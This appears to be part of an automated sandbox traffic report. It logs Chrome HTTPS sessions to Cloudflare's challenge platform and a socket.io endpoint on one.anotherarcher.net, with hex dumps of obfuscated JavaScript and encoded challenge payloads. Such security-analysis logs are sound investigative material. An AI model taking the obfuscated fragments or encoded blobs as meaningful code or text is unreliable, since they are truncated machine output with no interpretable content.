                                                                                                                                                                                                                                Data Ascii: (function(h2){h2=h1,eM[e[h2(593)]]&&(eM[h2(862)][h2(1472)](),eM[h2(862)][h2(1645)](),eM[h2(1576)]=!![],eM[h2(1500)][h2(929)]({'source':e[h2(1753)],'widgetId':eM[h2(1475)][h2(531)],'event':e[h2(647)],'cfChlOut':eM[h2(1475)][h2(534)],'cfChlOutS':eM[h2(1475)
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1369INData Raw: 34 29 2c 6a 5b 68 34 28 36 36 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 42 2c 43 29 7b 72 65 74 75 72 6e 20 42 2b 43 7d 2c 6a 5b 68 34 28 31 33 36 31 29 5d 3d 68 34 28 39 38 38 29 2c 6a 5b 68 34 28 31 31 33 38 29 5d 3d 68 34 28 35 35 38 29 2c 6a 5b 68 34 28 31 34 38 31 29 5d 3d 68 34 28 31 30 33 38 29 2c 6b 3d 6a 2c 6c 3d 6b 5b 68 34 28 39 37 32 29 5d 5b 68 34 28 31 34 39 33 29 5d 28 27 7c 27 29 2c 6d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6c 5b 6d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6e 3d 65 5b 68 34 28 39 38 37 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 6e 5b 68 34 28 31 32 37 34 29 5d 28 73 29 3e 2d 31 3f 65 4d 5b 68 34 28 36 37 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 35 29 7b 68 35 3d 68 34 2c 65 4d 5b 68 35 28 31
                                                                                                                                                                                                                                Data Ascii: 4),j[h4(660)]=function(B,C){return B+C},j[h4(1361)]=h4(988),j[h4(1138)]=h4(558),j[h4(1481)]=h4(1038),k=j,l=k[h4(972)][h4(1493)]('|'),m=0;!![];){switch(l[m++]){case'0':n=e[h4(987)]();continue;case'1':n[h4(1274)](s)>-1?eM[h4(677)](function(h5){h5=h4,eM[h5(1
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1369INData Raw: 5d 28 66 62 29 7d 2c 31 65 33 29 29 2c 66 56 3d 7b 7d 2c 66 56 5b 67 49 28 31 31 30 37 29 5d 3d 21 5b 5d 2c 66 56 5b 67 49 28 31 32 31 38 29 5d 3d 65 57 2c 66 56 5b 67 49 28 31 38 30 39 29 5d 3d 66 4a 2c 66 56 5b 67 49 28 37 33 38 29 5d 3d 66 4f 2c 66 56 5b 67 49 28 36 39 35 29 5d 3d 66 50 2c 66 56 5b 67 49 28 31 36 34 35 29 5d 3d 66 4b 2c 66 56 5b 67 49 28 31 36 30 36 29 5d 3d 66 51 2c 66 56 5b 67 49 28 31 33 32 39 29 5d 3d 66 4e 2c 66 56 5b 67 49 28 39 38 35 29 5d 3d 66 4d 2c 66 56 5b 67 49 28 31 37 31 31 29 5d 3d 66 38 2c 66 56 5b 67 49 28 31 32 31 37 29 5d 3d 66 49 2c 66 56 5b 67 49 28 31 34 30 38 29 5d 3d 66 48 2c 66 56 5b 67 49 28 36 31 33 29 5d 3d 66 30 2c 66 56 5b 67 49 28 38 36 35 29 5d 3d 66 6e 2c 66 56 5b 67 49 28 36 39 39 29 5d 3d 66 6f 2c 66
                                                                                                                                                                                                                                Data Ascii: ](fb)},1e3)),fV={},fV[gI(1107)]=![],fV[gI(1218)]=eW,fV[gI(1809)]=fJ,fV[gI(738)]=fO,fV[gI(695)]=fP,fV[gI(1645)]=fK,fV[gI(1606)]=fQ,fV[gI(1329)]=fN,fV[gI(985)]=fM,fV[gI(1711)]=f8,fV[gI(1217)]=fI,fV[gI(1408)]=fH,fV[gI(613)]=f0,fV[gI(865)]=fn,fV[gI(699)]=fo,f
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC1369INData Raw: 3d 68 7c 7c 6f 5b 6a 61 28 31 32 35 32 29 5d 28 76 6f 69 64 20 30 2c 68 29 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 67 75 28 68 29 2c 67 5b 6a 61 28 31 36 37 36 29 5d 5b 6a 61 28 31 30 37 36 29 5d 26 26 28 78 3d 78 5b 6a 61 28 36 35 35 29 5d 28 67 5b 6a 61 28 31 36 37 36 29 5d 5b 6a 61 28 31 30 37 36 29 5d 28 68 29 29 29 2c 78 3d 67 5b 6a 61 28 37 39 32 29 5d 5b 6a 61 28 31 32 35 39 29 5d 26 26 67 5b 6a 61 28 36 30 31 29 5d 3f 67 5b 6a 61 28 37 39 32 29 5d 5b 6a 61 28 31 32 35 39 29 5d 28 6e 65 77 20 67 5b 28 6a 61 28 36 30 31 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 6a 63 2c 48 29 7b 66 6f 72 28 6a 63 3d 6a 61 2c 47 5b 6a 63 28 31 34 32 34 29 5d 28 29 2c 48 3d 30 3b 48 3c 47 5b 6a 63 28 31 36 38 37 29 5d 3b 6f 5b 6a 63 28 31 32 35
                                                                                                                                                                                                                                Data Ascii: =h||o[ja(1252)](void 0,h))return j;for(x=gu(h),g[ja(1676)][ja(1076)]&&(x=x[ja(655)](g[ja(1676)][ja(1076)](h))),x=g[ja(792)][ja(1259)]&&g[ja(601)]?g[ja(792)][ja(1259)](new g[(ja(601))](x)):function(G,jc,H){for(jc=ja,G[jc(1424)](),H=0;H<G[jc(1687)];o[jc(125


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                57192.168.2.44981779.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:15 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB2ZG&sid=wyN_aHWEdrC85yTCAANR HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:16 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                58192.168.2.449818104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC927OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1196277238:1727987378:xQwj6ohpz9SE6dkMLdxLHe_SWJOpM8PdC9Yl1QqgVmI/8ccfd7c5dee932f4/855664d3aeedc47 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 32069
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                CF-Challenge: 855664d3aeedc47
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/sjco4/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC16384OUTData Raw: 76 5f 38 63 63 66 64 37 63 35 64 65 65 39 33 32 66 34 3d 4b 77 34 30 37 7a 75 6e 67 38 67 2d 43 65 70 61 6b 61 4e 38 34 61 59 61 35 61 58 61 43 56 5a 73 61 5a 48 6f 61 52 56 61 42 72 38 75 48 61 32 37 79 61 75 67 56 75 44 61 6d 56 48 6e 7a 61 51 68 47 61 6f 77 75 64 61 52 76 52 6c 61 48 24 33 70 33 61 6d 74 64 78 61 6f 30 2d 6e 61 56 30 65 48 53 46 61 7a 62 67 78 68 61 68 69 25 32 62 52 76 4d 79 48 46 73 6b 61 24 62 61 69 34 30 52 43 75 6a 38 38 7a 6f 56 61 6c 78 2d 39 7a 61 47 30 65 52 61 48 62 79 4f 38 4f 72 4d 34 56 61 74 75 7a 42 48 34 6f 7a 62 59 34 61 6f 34 24 73 36 7a 30 2d 4f 75 62 78 61 6b 57 30 77 5a 44 33 61 75 62 75 2d 31 59 33 49 61 65 46 61 52 59 2b 55 34 56 59 6a 68 4b 59 77 61 33 50 78 50 2b 33 6a 4a 42 51 4a 57 31 73 34 67 66 72 7a 4f 41
                                                                                                                                                                                                                                Data Ascii: v_8ccfd7c5dee932f4=Kw407zung8g-CepakaN84aYa5aXaCVZsaZHoaRVaBr8uHa27yaugVuDamVHnzaQhGaowudaRvRlaH$3p3amtdxao0-naV0eHSFazbgxhahi%2bRvMyHFska$bai40RCuj88zoValx-9zaG0eRaHbyO8OrM4VatuzBH4ozbY4ao4$s6z0-OubxakW0wZD3aubu-1Y3IaeFaRY+U4VYjhKYwa3PxP+3jJBQJW1s4gfrzOA
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC15685OUTData Raw: 61 2d 4d 30 42 61 49 61 4b 61 68 56 4e 72 30 70 55 7a 61 76 36 2d 36 6c 50 7a 77 61 30 61 72 61 52 30 61 4d 30 35 61 48 30 7a 59 61 6e 67 75 56 75 4c 72 75 30 2d 56 75 76 61 4f 77 65 38 61 33 61 58 61 34 62 7a 2b 52 32 61 68 62 75 35 61 34 61 52 34 75 49 56 51 61 48 34 61 59 61 6a 30 7a 61 75 38 61 69 30 6f 67 75 56 61 43 61 34 77 75 43 61 39 30 52 43 7a 35 61 70 61 75 43 61 30 61 55 43 38 62 7a 44 71 4a 61 4b 73 7a 6f 61 68 56 4b 47 7a 50 30 6f 6a 65 77 2d 56 30 4b 61 2d 64 61 75 61 6a 77 7a 50 61 65 61 35 62 34 59 7a 4e 30 33 4a 7a 50 61 69 7a 4f 30 33 4f 62 6c 61 7a 61 2d 64 61 78 61 76 37 4e 73 2d 6c 61 39 56 48 70 2d 51 61 2b 30 34 76 77 70 61 6e 34 75 30 7a 38 61 48 61 33 49 77 2b 30 6d 2d 74 34 7a 48 61 4d 30 61 6e 7a 73 61 55 61 38 67 7a 37 30 6e
                                                                                                                                                                                                                                Data Ascii: a-M0BaIaKahVNr0pUzav6-6lPzwa0araR0aM05aH0zYanguVuLru0-VuvaOwe8a3aXa4bz+R2ahbu5a4aR4uIVQaH4aYaj0zau8ai0oguVaCa4wuCa90RCz5apauCa0aUC8bzDqJaKszoahVKGzP0ojew-V0Ka-dauajwzPaea5b4YzN03JzPaizO03Oblaza-daxav7Ns-la9VHp-Qa+04vwpan4u0z8aHa3Iw+0m-t4zHaM0anzsaUa8gz70n
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC300INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:16 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 26780
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-gen: MEYXl074d6FBE+xk+iB84lKoVOe7huNgUbkD0ReejYbUZLrifcZOUcn9lQiHqqf6MYR3GojJlXzjuNX0$CJZu5gKzQQEUwQhP
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7f51ce01967-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1069INData Raw: 63 70 42 52 62 6d 46 50 68 49 56 37 61 5a 53 4c 65 46 74 5a 58 31 70 67 6f 6c 31 65 66 4b 5a 68 59 6f 43 69 65 32 2b 45 6a 4b 46 74 6a 61 75 56 73 6f 2b 6c 70 37 69 32 68 37 57 32 6b 72 78 2b 72 36 2b 78 74 6e 36 79 75 70 36 47 78 73 61 6f 7a 6f 4b 64 73 4b 33 41 78 63 6d 4e 72 38 4f 6b 6c 37 61 36 73 5a 79 65 73 4a 53 62 70 4a 2b 32 33 75 6d 35 76 4f 54 44 76 38 66 6d 77 4f 6d 72 72 38 50 43 36 76 69 7a 73 2f 57 33 35 2b 62 5a 38 4e 69 2b 33 74 76 54 41 4c 6a 55 34 65 55 47 32 67 4c 36 7a 73 37 63 35 65 62 76 34 64 48 72 41 66 55 52 2b 50 6f 51 39 76 54 36 2b 39 67 6a 33 39 59 56 45 75 62 34 4b 77 72 6c 4b 66 55 77 4d 53 66 38 48 4f 58 39 37 75 2f 74 49 66 49 74 4d 79 59 51 50 44 63 53 51 6a 6b 37 42 42 4d 42 52 42 77 45 45 79 6b 57 48 41 30 64 4c 6b 6f
                                                                                                                                                                                                                                Data Ascii: cpBRbmFPhIV7aZSLeFtZX1pgol1efKZhYoCie2+EjKFtjauVso+lp7i2h7W2krx+r6+xtn6yup6GxsaozoKdsK3AxcmNr8Okl7a6sZyesJSbpJ+23um5vOTDv8fmwOmrr8PC6vizs/W35+bZ8Ni+3tvTALjU4eUG2gL6zs7c5ebv4dHrAfUR+PoQ9vT6+9gj39YVEub4KwrlKfUwMSf8HOX97u/tIfItMyYQPDcSQjk7BBMBRBwEEykWHA0dLko
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 33 4b 51 75 34 79 4a 68 36 75 61 6f 4c 61 53 78 4b 44 45 6d 72 75 41 71 63 66 44 74 70 61 67 70 64 48 4e 78 61 57 31 30 35 47 4f 6b 36 7a 51 78 61 2b 6c 76 70 61 6f 6b 39 69 2b 72 65 43 31 72 37 7a 57 75 72 72 6d 35 65 54 61 36 2b 76 54 37 38 62 56 72 75 4c 70 31 2f 71 37 7a 38 37 2b 76 76 6e 71 30 4c 6e 41 32 74 4c 35 2b 2b 58 6f 31 77 54 35 37 65 6e 68 2f 67 37 38 33 41 58 4e 35 74 66 59 39 75 6e 78 46 77 63 55 2b 64 33 31 37 66 59 61 34 78 73 57 2b 52 6b 48 2b 53 59 58 2f 68 77 4d 48 79 6b 43 45 53 49 58 43 6a 73 6a 43 78 72 33 4c 41 30 4f 4e 43 30 53 4e 50 35 45 46 68 68 4b 52 44 67 32 43 41 34 43 4c 52 73 62 54 51 77 73 46 56 56 44 46 6a 5a 59 4d 6a 73 73 56 6b 31 42 50 57 46 47 4e 44 46 4a 47 31 6c 59 57 7a 74 67 4f 6b 6f 72 57 31 31 31 62 44 5a 6a
                                                                                                                                                                                                                                Data Ascii: 3KQu4yJh6uaoLaSxKDEmruAqcfDtpagpdHNxaW105GOk6zQxa+lvpaok9i+reC1r7zWurrm5eTa6+vT78bVruLp1/q7z87+vvnq0LnA2tL5++Xo1wT57enh/g783AXN5tfY9unxFwcU+d317fYa4xsW+RkH+SYX/hwMHykCESIXCjsjCxr3LA0ONC0SNP5EFhhKRDg2CA4CLRsbTQwsFVVDFjZYMjssVk1BPWFGNDFJG1lYWztgOkorW111bDZj
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 36 61 74 33 71 34 6e 6f 2b 64 6d 71 4f 5a 73 72 53 59 7a 4c 6d 75 6f 49 75 65 79 70 76 44 6a 4d 4b 32 7a 74 53 72 6a 5a 6e 4b 75 35 66 62 79 38 7a 58 73 37 76 42 32 72 61 34 76 61 53 6a 79 4c 76 67 79 4e 2f 54 77 76 54 44 33 72 48 48 71 38 62 70 75 50 6e 76 7a 63 33 74 2b 50 7a 54 38 4e 44 45 33 2f 72 37 41 72 37 71 77 4f 4d 49 7a 75 58 7a 36 65 50 57 41 75 54 69 32 50 4c 57 45 74 73 63 49 75 2f 68 45 42 6f 67 35 53 55 6d 46 4f 55 57 41 65 67 77 36 52 48 73 44 79 62 30 4e 52 41 55 42 54 45 34 47 51 34 74 4d 68 73 78 46 52 72 39 50 67 45 65 42 77 55 35 42 6a 63 4a 52 41 59 67 44 7a 38 4e 4b 45 5a 53 52 68 52 57 4d 79 30 6d 52 52 6f 52 46 68 4e 50 57 78 38 32 4a 6c 63 33 58 68 77 6c 59 54 56 71 58 43 70 77 61 45 35 6b 58 7a 52 68 4d 32 6c 6f 54 6b 39 6e 62
                                                                                                                                                                                                                                Data Ascii: 6at3q4no+dmqOZsrSYzLmuoIueypvDjMK2ztSrjZnKu5fby8zXs7vB2ra4vaSjyLvgyN/TwvTD3rHHq8bpuPnvzc3t+PzT8NDE3/r7Ar7qwOMIzuXz6ePWAuTi2PLWEtscIu/hEBog5SUmFOUWAegw6RHsDyb0NRAUBTE4GQ4tMhsxFRr9PgEeBwU5BjcJRAYgDz8NKEZSRhRWMy0mRRoRFhNPWx82Jlc3XhwlYTVqXCpwaE5kXzRhM2loTk9nb
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 45 74 71 4f 61 71 61 54 43 78 35 75 62 75 72 6a 4a 72 6f 6e 56 73 61 69 6f 71 63 58 55 73 38 71 59 6d 64 4f 63 75 39 72 53 76 63 2f 67 6f 63 4f 6e 30 36 47 33 35 75 6e 70 76 72 44 4f 37 2f 4c 43 77 4d 4b 75 74 4d 50 45 2f 50 76 38 78 37 7a 4d 32 66 58 55 30 4e 33 32 42 2f 54 65 2b 67 7a 4b 78 64 66 38 7a 67 6a 6d 37 68 4c 50 36 68 41 4c 41 39 6f 61 32 77 34 58 46 50 50 55 33 65 30 63 49 41 51 45 4a 4f 67 44 36 75 50 35 48 66 77 65 2b 79 51 6d 48 67 34 35 38 52 55 33 46 42 6f 4e 43 79 35 41 43 78 55 52 45 77 38 33 4a 52 30 54 41 79 77 35 50 54 6b 71 4c 46 4d 30 4d 30 42 57 49 78 59 5a 56 6a 78 53 54 31 34 65 55 6a 6c 62 4e 44 38 2f 52 32 52 69 56 46 31 48 53 7a 68 43 4c 47 4e 49 62 6d 34 2f 61 32 42 7a 4d 57 4a 6b 4f 55 64 78 57 46 46 4e 65 56 56 2b 67 47
                                                                                                                                                                                                                                Data Ascii: EtqOaqaTCx5uburjJronVsaioqcXUs8qYmdOcu9rSvc/gocOn06G35unpvrDO7/LCwMKutMPE/Pv8x7zM2fXU0N32B/Te+gzKxdf8zgjm7hLP6hALA9oa2w4XFPPU3e0cIAQEJOgD6uP5Hfwe+yQmHg458RU3FBoNCy5ACxUREw83JR0TAyw5PTkqLFM0M0BWIxYZVjxST14eUjlbND8/R2RiVF1HSzhCLGNIbm4/a2BzMWJkOUdxWFFNeVV+gG
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 6a 4a 69 72 6d 36 6d 72 72 38 4f 6f 69 34 69 66 74 4d 50 4e 74 38 66 4e 72 70 47 66 6b 37 61 67 72 61 47 76 30 65 65 39 70 65 62 73 35 4c 72 68 36 74 47 2b 38 65 4c 51 31 64 2f 4e 7a 39 57 74 39 66 6a 58 78 2b 76 36 37 39 45 45 2f 66 50 31 41 2b 6a 61 34 76 6b 4c 36 4f 59 41 33 39 7a 67 43 41 45 42 35 74 66 74 36 41 67 62 44 4f 67 62 44 78 54 31 34 51 4d 55 2b 2b 54 6e 36 66 34 4c 2f 53 49 50 41 43 41 54 44 51 67 53 45 52 55 43 4b 42 66 34 43 42 51 56 47 6b 41 62 38 78 49 58 50 6a 30 31 4d 52 49 41 41 51 55 48 4b 68 30 4f 49 53 6f 64 45 43 45 57 52 53 49 74 55 43 39 63 54 46 34 71 4e 6b 41 67 50 30 56 66 59 31 41 30 4d 53 4d 38 61 6c 39 69 55 44 39 78 59 56 39 44 56 45 55 77 4d 6b 56 7a 61 48 46 30 53 56 78 4b 61 7a 52 2b 59 48 68 31 55 49 46 65 67 58 56
                                                                                                                                                                                                                                Data Ascii: jJirm6mrr8Ooi4iftMPNt8fNrpGfk7agraGv0ee9pebs5Lrh6tG+8eLQ1d/Nz9Wt9fjXx+v679EE/fP1A+ja4vkL6OYA39zgCAEB5tft6AgbDOgbDxT14QMU++Tn6f4L/SIPACATDQgSERUCKBf4CBQVGkAb8xIXPj01MRIAAQUHKh0OISodECEWRSItUC9cTF4qNkAgP0VfY1A0MSM8al9iUD9xYV9DVEUwMkVzaHF0SVxKazR+YHh1UIFegXV
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 36 53 74 74 4c 58 54 71 4a 47 77 70 70 57 64 74 4e 50 4a 76 64 66 5a 34 4c 4f 6a 34 5a 37 5a 36 73 79 6c 7a 64 36 70 78 39 75 72 30 4e 4f 2f 38 37 58 59 73 50 6a 57 79 75 71 33 30 2f 48 61 2f 63 48 57 78 66 37 76 33 2b 54 44 79 76 76 56 34 42 41 4a 42 75 37 74 45 77 30 55 38 64 62 54 2b 76 4c 34 39 65 66 59 37 41 73 44 37 78 51 48 41 2f 50 39 45 67 59 49 37 41 62 35 48 75 67 62 44 51 45 6f 44 67 2f 76 4d 41 38 57 38 77 55 4d 47 52 6a 38 48 77 34 68 51 42 59 6c 4a 52 49 56 4b 54 34 46 4a 53 73 59 4d 69 34 65 52 30 73 77 4e 53 41 52 51 7a 6b 6f 4f 6a 6f 6f 55 30 74 52 4c 6c 64 62 4e 6a 55 78 57 30 73 33 61 31 39 47 50 6b 6c 46 52 7a 31 79 4d 46 5a 46 55 57 74 56 53 56 52 73 58 6b 70 5a 66 46 35 64 59 58 78 6e 5a 46 56 52 59 47 6c 38 56 58 78 63 61 58 39 71
                                                                                                                                                                                                                                Data Ascii: 6SttLXTqJGwppWdtNPJvdfZ4LOj4Z7Z6sylzd6px9ur0NO/87XYsPjWyuq30/Ha/cHWxf7v3+TDyvvV4BAJBu7tEw0U8dbT+vL49efY7AsD7xQHA/P9EgYI7Ab5HugbDQEoDg/vMA8W8wUMGRj8Hw4hQBYlJRIVKT4FJSsYMi4eR0swNSARQzkoOjooU0tRLldbNjUxW0s3a19GPklFRz1yMFZFUWtVSVRsXkpZfF5dYXxnZFVRYGl8VXxcaX9q
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 69 6e 74 4d 71 34 71 73 36 38 77 71 2f 53 6e 39 43 7a 35 73 6a 55 75 63 54 41 78 37 75 34 35 74 4b 2b 38 75 4c 51 78 4e 44 69 34 63 6e 71 7a 4e 6e 4e 37 75 72 66 7a 77 50 79 34 4e 50 51 34 4f 62 57 2b 75 44 74 32 39 67 48 37 4f 45 44 38 50 50 6c 42 2f 6a 7a 35 68 76 34 2b 2b 7a 34 31 77 37 77 45 77 55 44 38 68 63 58 43 50 63 72 42 51 72 38 43 51 6b 52 41 69 4d 46 45 77 55 6e 45 52 6f 4b 4b 2f 63 62 44 68 6e 37 49 51 38 7a 49 54 45 55 45 54 73 6f 47 45 73 49 4b 52 34 2f 44 43 77 67 48 54 45 32 4a 43 45 35 4f 53 70 4c 4e 54 77 74 4b 54 45 2b 4d 53 31 42 54 6a 5a 58 4a 46 59 34 52 55 31 4a 4f 31 39 46 54 6b 46 6a 4d 46 4a 45 51 56 46 62 53 6d 74 64 57 45 74 2f 50 46 31 52 58 56 6c 78 56 48 64 2f 61 46 68 6c 58 58 5a 63 66 32 6c 75 59 46 31 74 66 6d 53 58 67
                                                                                                                                                                                                                                Data Ascii: intMq4qs68wq/Sn9Cz5sjUucTAx7u45tK+8uLQxNDi4cnqzNnN7urfzwPy4NPQ4ObW+uDt29gH7OED8PPlB/jz5hv4++z41w7wEwUD8hcXCPcrBQr8CQkRAiMFEwUnERoKK/cbDhn7IQ8zITEUETsoGEsIKR4/DCwgHTE2JCE5OSpLNTwtKTE+MS1BTjZXJFY4RU1JO19FTkFjMFJEQVFbSmtdWEt/PF1RXVlxVHd/aFhlXXZcf2luYF1tfmSXg
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC1369INData Raw: 61 74 38 4f 37 33 73 57 30 31 37 44 58 75 63 53 30 31 62 37 66 77 4e 6d 39 79 2b 37 53 78 4e 66 45 36 4e 76 55 39 38 33 5a 74 39 6a 58 36 74 33 51 34 39 54 41 2b 76 6e 70 31 4e 58 6e 36 4f 7a 5a 34 50 41 47 7a 2f 37 2b 37 78 4d 4a 35 2f 51 4c 38 76 7a 58 45 4f 34 41 36 77 59 62 39 67 62 39 35 2f 63 69 2b 41 67 59 49 50 30 6a 48 7a 4d 54 2f 67 4d 73 37 79 6b 62 39 54 63 61 4c 52 6b 53 50 42 4d 69 47 67 51 54 41 78 55 6b 4d 30 77 61 50 7a 74 50 53 52 73 66 53 53 56 46 4e 78 4a 54 4f 30 6b 31 4c 6c 30 76 50 6a 59 67 4d 54 51 78 51 46 45 79 4e 6c 74 58 61 31 6b 33 50 53 64 67 53 56 41 38 4d 57 78 48 55 56 6c 6a 53 55 56 7a 62 47 64 4a 66 48 68 4e 67 6e 39 62 5a 55 42 34 56 32 68 55 62 6f 74 66 62 6e 39 37 62 6e 43 44 62 47 52 78 68 34 69 44 5a 46 56 2b 65 48
                                                                                                                                                                                                                                Data Ascii: at8O73sW017DXucS01b7fwNm9y+7SxNfE6NvU983Zt9jX6t3Q49TA+vnp1NXn6OzZ4PAGz/7+7xMJ5/QL8vzXEO4A6wYb9gb95/ci+AgYIP0jHzMT/gMs7ykb9TcaLRkSPBMiGgQTAxUkM0waPztPSRsfSSVFNxJTO0k1Ll0vPjYgMTQxQFEyNltXa1k3PSdgSVA8MWxHUVljSUVzbGdJfHhNgn9bZUB4V2hUbotfbn97bnCDbGRxh4iDZFV+eH


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                59192.168.2.449819104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd7ea7f73238a&lang=auto HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:16 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:16 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 126771
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7f5e8687ced-EWR
